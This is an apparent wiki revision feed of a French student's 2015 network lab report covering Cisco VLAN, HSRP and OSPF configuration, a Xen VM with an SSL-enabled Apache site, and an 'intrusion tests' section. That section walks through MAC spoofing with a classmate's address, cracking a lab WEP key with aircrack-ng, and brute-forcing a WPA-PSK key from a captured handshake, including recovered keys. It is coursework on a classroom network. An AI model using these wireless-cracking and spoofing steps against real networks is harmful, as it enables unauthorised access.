- standby 1 ip 172.20.100.254 // adresse de passerelle&lt;br /&gt;
- standby 1 preempt  //Utilisation du protocole HSRP nécessaire à la redondance&lt;br /&gt;
- standby 1 priority 110 // priorité pour la prise de l'adresse passerelle&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour affecter un nom à un VLAN: &lt;br /&gt;
&lt;br /&gt;
- conf t &lt;br /&gt;
- vlan8&lt;br /&gt;
- name Papy&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour affecter un port (içi pour internet)&lt;br /&gt;
&lt;br /&gt;
- conf t &lt;br /&gt;
- interface GigabitEthernet 0/47 // on agit sur ce port&lt;br /&gt;
- Sitchport mode access&lt;br /&gt;
- switchport access vlan131 // Définition de l'association entre le port et le vlan pour internet&lt;br /&gt;
- no shut&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour l'échange automatique des tables de routages :&lt;br /&gt;
&lt;br /&gt;
- Switch(config)#router ospf 1&lt;br /&gt;
-Switch(config-router)#log-adjacency-changes&lt;br /&gt;
-Switch(config-router)#router-id 172.20.100.252&lt;br /&gt;
-Switch(config-router)#log-adjacency-changes   &lt;br /&gt;
-Switch(config-router)#summary-address 172.20.96.0 255.255.240.0&lt;br /&gt;
-Switch(config-router)#summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
-Switch(config-router)#redistribute connected metric 20 subnets &lt;br /&gt;
-Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour que le routeur de l'école connaîsse toutes ces adresses et vis-versa, on effectue un échange de table de routage par le protocole de routage OSPF. Letric à 20 permettra au routeur de l'école de prendre en priorité ma table de routage à celle de Clément qui lui est à 30. Dès lors que mon routeur ne sera plus en état de foncctionner, le routeur de l'école prendra directement celle de Clément.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt; Tests d'intrusion &amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Intrusion par changement d'adresse MAC&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Lorsque j'ai récupéré mon EEPC, Marouanne me l'avait configuré pour que je puisse me connecter avec ce dernier sur internet.&lt;br /&gt;
En modifiant le fichier /etc/network/interfaces, je remplace T1 par T2 et le mot de passe 0000000000 en 1111111111. De cette façon je pourrais aller sur internet en passant pas la wifi de Maxime. &lt;br /&gt;
&lt;br /&gt;
RESULTAT : Impossible de me connecter au réseau. En effet mon adresse MAC n'est pas connue de Maxime donc je suis rejeté. &lt;br /&gt;
&lt;br /&gt;
SOLUTION : Usurper l'identité de quelqu'un autorisé. J'ai donc pris par a force l'adresse de Gauthier 00:15:AF:E6:ED:B1&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Avec une simple ligne de code : je change mon adresse MAC !&lt;br /&gt;
- ifconfig wlan0 down&lt;br /&gt;
- ifconfig wlan0 hw ether 00:15:AF:E6:ED:B1  //adresse mac de Gauthier&lt;br /&gt;
- ifconfig wlan0 up&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
MAGNIFIQUE je peux maintenant aller sur internet via la borne wifi de Maxime.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Cassage de clef WEP d'un point d'accès Wifi&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A partir de là Linux est installé sur la machine. Je vais donc passer maintenant au crackage de la clé WEP.&lt;br /&gt;
&lt;br /&gt;
Pour cela j'installe aircrack.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code : &lt;br /&gt;
apt-get install aircrack-ng&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Modification du fichier /etc/apt/sources.list : &lt;br /&gt;
rajout de contrib non-free&lt;br /&gt;
&lt;br /&gt;
Modification du fichier /etc/network/interfaces : &lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static &lt;br /&gt;
     address 172.20.106.6&lt;br /&gt;
     netmask 255.255.255.0&lt;br /&gt;
     gateway 172.20.106.254&lt;br /&gt;
&lt;br /&gt;
Modification du fichier /etc/resolv.conf : &lt;br /&gt;
nameserver 193.48.57.34&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code : &lt;br /&gt;
apt-get install firmware-linux-nonfree&lt;br /&gt;
apt-get remove network-manager&lt;br /&gt;
apt-get install broadcom-sta-dkms&lt;br /&gt;
modprobe wl&lt;br /&gt;
modprobe -r b44 b43 b43legacy ssb brcmsmac&lt;br /&gt;
modprobe -r wl&lt;br /&gt;
modprobe wl*dmseg&lt;br /&gt;
dmseg&lt;br /&gt;
ifconfig -a &lt;br /&gt;
reboot&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A partir de là je tape la commande airmon-ng et j'obtiens enfin wlan0, Broadcom et wl - [phy0]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
code :&lt;br /&gt;
airmon -ng start wlan1 ==&amp;gt; cela ne fonctionne pas grâce a dmseg on voit que c'est à cause de fail to load rt2870.bin&lt;br /&gt;
soltion : apt-get install firmware-ralink&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Je stop les deux mon0 et mon1 que j'avais créé : via la commande airmon-ng stop mon1 et mon0&lt;br /&gt;
&lt;br /&gt;
Je ré-ouvre une mon0.&lt;br /&gt;
&lt;br /&gt;
J'utilise la commande airodump-ng mon0 afin voir tous les SSID qui passent en WIFI.&lt;br /&gt;
&lt;br /&gt;
Ma cible étant les cracottes je filtre pour n'avoir qu'elles en selectionnant le channel 5 car elles y sont tous dessus.&lt;br /&gt;
&lt;br /&gt;
Code : airodump-ng mon0 --channel 5. Je ne voit que les cracottes. Je prends la cracotte qui me concerne, c'est à dire la 8. (même numéro de vlan que moi)&lt;br /&gt;
&lt;br /&gt;
code : airodump-ng mon0 --channel 5 --BSSID 04:da:d2:9c:50:57 ainsi je ne vois que la cracotte que je veux.&lt;br /&gt;
&lt;br /&gt;
Maintenant pour copier les données dans un fichier il me suffit de rajouter l'option --w nomDeFichier&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Grâce à la commande aircrack-ng -s *.cap : la clé WEP de la cracotte08 a été cracké : celle-ci est : aa:aa:aa:aa:aa:aa:aa:aa:aa:bb:bb:bb:bb ! &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Cassage de mot de passe WPA-PSK par force brute&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On va commencer par créer un dictionnaire  de clé : &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
#include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
int main (void)&lt;br /&gt;
{&lt;br /&gt;
    int i=0;&lt;br /&gt;
    while(i&amp;lt;100000000)&lt;br /&gt;
    {&lt;br /&gt;
        printf(&amp;quot;%08d\n&amp;quot;,i);&lt;br /&gt;
        i++;&lt;br /&gt;
    }&lt;br /&gt;
    return 0;&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite récupérer le handshake :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
airodump-ng mon0 --channel 7 --bssid 04:da:d2:9c:50:57 -w handshake&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&lt;br /&gt;
J'envoie le fichier handshake-01.cap sur la zabeth car le PC est beaucoup plus rapide pour réaliser le traitement et trouver la clé.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
df&lt;br /&gt;
fdisk -l&lt;br /&gt;
mkfs /dev/sda1&lt;br /&gt;
mount /dev/sda1 /mnt&lt;br /&gt;
cp handshake-01.cap /mnt&lt;br /&gt;
umount /mnt&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois que le fichier est sur pifou, je lance le traitement :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
aircrack-ng -w dico.txt handshake-01.cap&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Après 58 minutes et 48 secondes la clé est trouvée : 12399908 !&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt;Installation des systèmes d'exploitation&amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
J'ai créé une machine virtuelle en me connectant sur root@cordouan.insecserv.deule.net&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code :&lt;br /&gt;
xen-create-image --hostname Werewolf --ip 193.48.57.183 --netmask 255.255.255.240 --dir /usr/local/xen&lt;br /&gt;
&lt;br /&gt;
nano /etc/ssh/sshd_config allow root login (without password)-&amp;gt;yes&lt;br /&gt;
apt -get purge network-manager systemd&lt;br /&gt;
init tab ==&amp;gt; 1:??45: ..... tty1 à remplacer par 1:??45: ..... hvc0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Hostname        :  Werewolf&lt;br /&gt;
Distribution    :  jessie&lt;br /&gt;
MAC Address     :  00:16:3E:25:96:A7&lt;br /&gt;
IP Address(es)  :  193.48.57.18&lt;br /&gt;
RSA Fingerprint :  4d:ea:00:cc:51:7f:85:92:ec:2d:c3:4e:f4:81:b1:3e&lt;br /&gt;
Root Password   :  Il ne serait plus secret sinon ;)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A RETENIR :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Pour ouvrir la machine : xl console Werewolf&lt;br /&gt;
Pour la fermer : halt&lt;br /&gt;
Pour rallumer la machiner si éteinte : xl create /etc/xen/Werewolf.cfg&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Je commence par installer sur la machine virtuellepostfix et bsd-mailx :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
apt-get install postfix&lt;br /&gt;
vim /etc/aliases ==&amp;gt; rajout d'une ligne admin:   root&lt;br /&gt;
newaliases&lt;br /&gt;
apt-get install mailx&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Maintenant lorsque j'envoie un mail à partir de n'importe quelle adresse mail vers admin@hunt3r.lol, je le reçois et via la commande mailx je peux voir que j'ai reçu un mail. &lt;br /&gt;
&lt;br /&gt;
En utilisant &amp;quot;p&amp;quot; je peux l'afficher.&lt;br /&gt;
&lt;br /&gt;
Maintenant je vais réclamer mon certificat : &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Je vais sur le site de gandi&lt;br /&gt;
Je clique sur Certificat SSL qui est actuellement inactif&lt;br /&gt;
Je vais dans la FAQ et je cherche comment générer une CSR ? &lt;br /&gt;
Je récupère la commande : openssl req -nodes -newkey rsa:2048 -sha256 -keyout Werewolf.key -out Werewolf.csr que j'utilise dans ma VM&lt;br /&gt;
Country Name (2 letter code) [AU]: FR&lt;br /&gt;
State or Province Name (full name) [Some-State]: Nord&lt;br /&gt;
Locality Name (eg, city) []: Lille&lt;br /&gt;
Organization Name (eg, company) [Internet Widgits Pty Ltd]: PolytechLille&lt;br /&gt;
Organizational Unit Name (eg, section) []: &lt;br /&gt;
Common Name (eg, YOUR name) []: hunt3r.lol&lt;br /&gt;
Email Address []: admin@hunt3r.lol&lt;br /&gt;
A challenge password []: &lt;br /&gt;
An optional company name []:&lt;br /&gt;
Il me génère donc deux fichiers, le .csr et le .key&lt;br /&gt;
J'ouvre le fichier Werewolf.csr que je copie colle dans le champ CSR sur gandi.&lt;br /&gt;
&lt;br /&gt;
Je valide le tout et à présent sur le site de gandi j'ai : Certificat SSL : hunt3r.lol (et non plus inactif)&lt;br /&gt;
Je valide ma demande grâce au code reçu dans ma boite mail hunt3r et j'attends le certificat.&lt;br /&gt;
Une fois reçu je crée un fichier Werewolf.cer et je colle le certificat que j'ai récupéré.&lt;br /&gt;
Même chose pour les certificats intermédiaire.&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Je peux commencer alors la configuration d'apache2 avec mon certificat :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
cd /etc/apache2/sites-available&lt;br /&gt;
vim default-ssl.conf&lt;br /&gt;
                SSLCertificateFile      /root/Werewolf.cer&lt;br /&gt;
                SSLCertificateKeyFile /root/Werewolf.key&lt;br /&gt;
                #SSLCertificateChainFile /root/WerewolfInter.cer&lt;br /&gt;
&lt;br /&gt;
3 commandes me permettent de mettre en route le tout :&lt;br /&gt;
a2ensite default-ssl&lt;br /&gt;
a2enmod ssl&lt;br /&gt;
service apache2 restart&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois cela fait, lorsque je vais sur ma page internet je remarque je peux y aller à la fois normalement c'est à dire en écrivant : http://www.hunt3r.lol/ mais aussi en utilisant la connexion sécurisée : https://www.hunt3r.lol/. On remarque qu'avec l'https on a bien un cadenas.&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt;Services Internet&amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Le nom de domaine que j'ai réservé est : hunt3r.lol&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt;Réalisation&amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt; Installation de LINUX sur les nouveaux PC HP &amp;lt;/h3&amp;gt;&lt;br /&gt;
J'ai allumé le nouveau PC et j'ai configuré son nom avec le thème Poisson : perche. [http://www.carnets-de-captures.fr/illustrations/proies_perche.jpg]&lt;br /&gt;
&lt;br /&gt;
Ensuite je redémarre le PC avec le mode boot (F9) puis je fais F10. Je vais dans System Configurations. Je change la langue en français puis je vais dans option d'amorçage et je désactive le démarrage sécurisé. Il faut quitter et sauvegarder. Entrer le code 8370 + entrer. Redémarrer et faire F9, puis reboot sur la clé usb sur laquelle on a monté l'image de Debian GNU/Linux 8.2.0 à l'aide de cette commande : &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code :&lt;br /&gt;
root@zabeth09:/tmp# dd if=debian-8.2.0-amd64-netinst.iso of=/dev/sdb&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
On va donc configurer le réseau nous-même.&lt;br /&gt;
Adresse IP : 172.20.106.6&lt;br /&gt;
Mask : 255.255.255.0&lt;br /&gt;
Adresse passerelle : 172.20.106.254&lt;br /&gt;
Adresse des serveurs de noms : 193.48.57.34&lt;br /&gt;
Nom de machine : perche&lt;br /&gt;
Domaine : deule.net&lt;br /&gt;
&lt;br /&gt;
Mot de passe pour superutilisateur : celui de d'habitude pour un root&lt;br /&gt;
Nouvel utilisateur : pifou&lt;br /&gt;
Mot de passe nouvel utilisateur : celui de d'habitude pour pifou&lt;br /&gt;
&lt;br /&gt;
Arrivée au partitionnement :&lt;br /&gt;
&lt;br /&gt;
J'ai cliqué sur manuel puis sur le n°3 qui avait 22 Gb. J'ai partitionné à 8Gb de façon à avoir 8Gb pour Windows ( on s'en fou de lui) et 14.6Gb pour nous. J'ai ensuite cliqué partitionnement assisté et utiliser le plus grand espace disponible. &lt;br /&gt;
Nom du miroir de l'archive Debian : debian.polytech-lille.fr&lt;br /&gt;
Mandataire HTTP : http://proxy.polytech-lille.fr:3128&lt;br /&gt;
Logiciels à installer : Xfce, service SSH  et utilitaies usuels du système (à valider à l'aider de la barre espace)&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Ebourre</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&amp;diff=23101</id>
		<title>TP sysres IMA2a5 2015/2016 G6</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2015/2016_G6&amp;diff=23101"/>
				<updated>2015-11-20T10:52:54Z</updated>
		
		<summary type="html">&lt;p&gt;Ebourre : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;h1&amp;gt; Projet Systèmes&amp;amp;Réseaux IMA2A5 &amp;lt;/h1&amp;gt;&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Cet atelier consiste en la réalisation d'une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. Il se décompose en deux parties : tout d'abord une partie à réaliser seul puis d'une réalisation commune. Cette dernière comprend l'installation d'une machine virtuelle Xen, l'implantation d'un auto-commutateur téléphonique logiciel ainsi que la mise en place d'un réseau Wifi et d'un site sécurisés. &amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour ma part, dans un premier temps je m'occuperais de la configuration d'un des deux routeurs permettant la redondance.&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt; Architecture réseau &amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Dans ma partie, il me fallait donc réaliser la configuration du routeur n°1 dans le but de créer une redondance. Cette dernière permettra donc dans le cas ou l'un des routeurs d'une des deux salles de TP tombe, les ordinateurs du routeur HS continueront d'avoir accès à internet.&lt;br /&gt;
&lt;br /&gt;
La configuration du routeur consistait à affecter à chacun des réseaux une adresse IP. Voici le tableau reprenant le descriptif des VLAN's.&lt;br /&gt;
&amp;lt;center&amp;gt;&lt;br /&gt;
&amp;lt;table&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;'''N° du VLAN'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Nom'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse IP'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse Routeur 1'''&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;'''Adresse Passerelle'''&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;2&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Puduc&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.100.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;3&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Nounours&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.101.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;4&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Jeuno&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.102.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;5&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Relax&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.103.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;6&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;John&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.104.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;7&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Loki&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.105.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;8&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Papy&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.0/24&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.252&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;172.20.106.254&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;10&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Hub&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.176/28&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.188&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;193.48.57.190&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;tr&amp;gt;&amp;lt;th&amp;gt;131&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;Interco&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;192.168.222.8/29&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;192.168.222.9&amp;lt;/th&amp;gt;&amp;lt;th&amp;gt;X&amp;lt;/th&amp;gt;&amp;lt;/tr&amp;gt;&lt;br /&gt;
&amp;lt;/table&amp;gt;&lt;br /&gt;
&amp;lt;/center&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Afin de créer la redondance on utilise l'adresse passerelle, cette dernière sera &amp;quot;prise&amp;quot; par le routeur le plus prioritaire. &lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code sous minicom pour réaliser l'adressage des VLan's: &lt;br /&gt;
&lt;br /&gt;
- en // passage en mode administrateur&lt;br /&gt;
- conf t &lt;br /&gt;
- int vlan2 //modification du vlan2&lt;br /&gt;
- ip address 172.20.100.252 255.255.255.0 // association du l'adresse IP et du mask au vlan2&lt;br /&gt;
- standby 1 ip 172.20.100.254 // adresse de passerelle&lt;br /&gt;
- standby 1 preempt  //Utilisation du protocole HSRP nécessaire à la redondance&lt;br /&gt;
- standby 1 priority 110 // priorité pour la prise de l'adresse passerelle&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour affecter un nom à un VLAN: &lt;br /&gt;
&lt;br /&gt;
- conf t &lt;br /&gt;
- vlan8&lt;br /&gt;
- name Papy&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour affecter un port (içi pour internet)&lt;br /&gt;
&lt;br /&gt;
- conf t &lt;br /&gt;
- interface GigabitEthernet 0/47 // on agit sur ce port&lt;br /&gt;
- Sitchport mode access&lt;br /&gt;
- switchport access vlan131 // Définition de l'association entre le port et le vlan pour internet&lt;br /&gt;
- no shut&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code pour l'échange automatique des tables de routages :&lt;br /&gt;
&lt;br /&gt;
- Switch(config)#router ospf 1&lt;br /&gt;
-Switch(config-router)#log-adjacency-changes&lt;br /&gt;
-Switch(config-router)#router-id 172.20.100.252&lt;br /&gt;
-Switch(config-router)#log-adjacency-changes   &lt;br /&gt;
-Switch(config-router)#summary-address 172.20.96.0 255.255.240.0&lt;br /&gt;
-Switch(config-router)#summary-address 193.48.57.176 255.255.255.240&lt;br /&gt;
-Switch(config-router)#redistribute connected metric 20 subnets &lt;br /&gt;
-Switch(config-router)#network 192.168.222.8 0.0.0.7 area 2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour que le routeur de l'école connaîsse toutes ces adresses et vis-versa, on effectue un échange de table de routage par le protocole de routage OSPF. Letric à 20 permettra au routeur de l'école de prendre en priorité ma table de routage à celle de Clément qui lui est à 30. Dès lors que mon routeur ne sera plus en état de foncctionner, le routeur de l'école prendra directement celle de Clément.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''''&amp;lt;h2&amp;gt; Tests d'intrusion &amp;lt;/h2&amp;gt;'''''&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Intrusion par changement d'adresse MAC&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Lorsque j'ai récupéré mon EEPC, Marouanne me l'avait configuré pour que je puisse me connecter avec ce dernier sur internet.&lt;br /&gt;
En modifiant le fichier /etc/network/interfaces, je remplace T1 par T2 et le mot de passe 0000000000 en 1111111111. De cette façon je pourrais aller sur internet en passant pas la wifi de Maxime. &lt;br /&gt;
&lt;br /&gt;
RESULTAT : Impossible de me connecter au réseau. En effet mon adresse MAC n'est pas connue de Maxime donc je suis rejeté. &lt;br /&gt;
&lt;br /&gt;
SOLUTION : Usurper l'identité de quelqu'un autorisé. J'ai donc pris par a force l'adresse de Gauthier 00:15:AF:E6:ED:B1&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Avec une simple ligne de code : je change mon adresse MAC !&lt;br /&gt;
- ifconfig wlan0 down&lt;br /&gt;
- ifconfig wlan0 hw ether 00:15:AF:E6:ED:B1  //adresse mac de Gauthier&lt;br /&gt;
- ifconfig wlan0 up&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
MAGNIFIQUE je peux maintenant aller sur internet via la borne wifi de Maxime.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;h3&amp;gt;Cassage de clef WEP d'un point d'accès Wifi&amp;lt;/h3&amp;gt;&lt;br /&gt;
&lt;br /&gt;
A partir de là Linux est installé sur la machine. Je vais donc passer maintenant au crackage de la clé WEP.&lt;br /&gt;
&lt;br /&gt;
Pour cela j'installe aircrack.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code : &lt;br /&gt;
apt-get install aircrack-ng&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Modification du fichier /etc/apt/sources.list : &lt;br /&gt;
rajout de contrib non-free&lt;br /&gt;
&lt;br /&gt;
Modification du fichier /etc/network/interfaces : &lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static &lt;br /&gt;
     address 172.20.106.6&lt;br /&gt;
     netmask 255.255.255.0&lt;br /&gt;
     gateway 172.20.106.254&lt;br /&gt;
&lt;br /&gt;
Modification du fichier /etc/resolv.conf : &lt;br /&gt;
nameserver 193.48.57.34&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Code : &lt;br /&gt;
apt-get install firmware-linux-nonfree&lt;br /&gt;
apt-get remove network-manager&lt;br /&gt;
apt-get install broadcom-sta-dkms&lt;br /&gt;
modprobe wl&lt;br /&gt;
modprobe -r b44 b43 b43legacy ssb brcmsmac&lt;br /&gt;
modprobe -r wl&lt;br /&gt;
modprobe wl*dmseg&lt;br /&gt;
dmseg&lt;br /&gt;
ifconfig -a &lt;br /&gt;
reboot&lt;br /&gt;
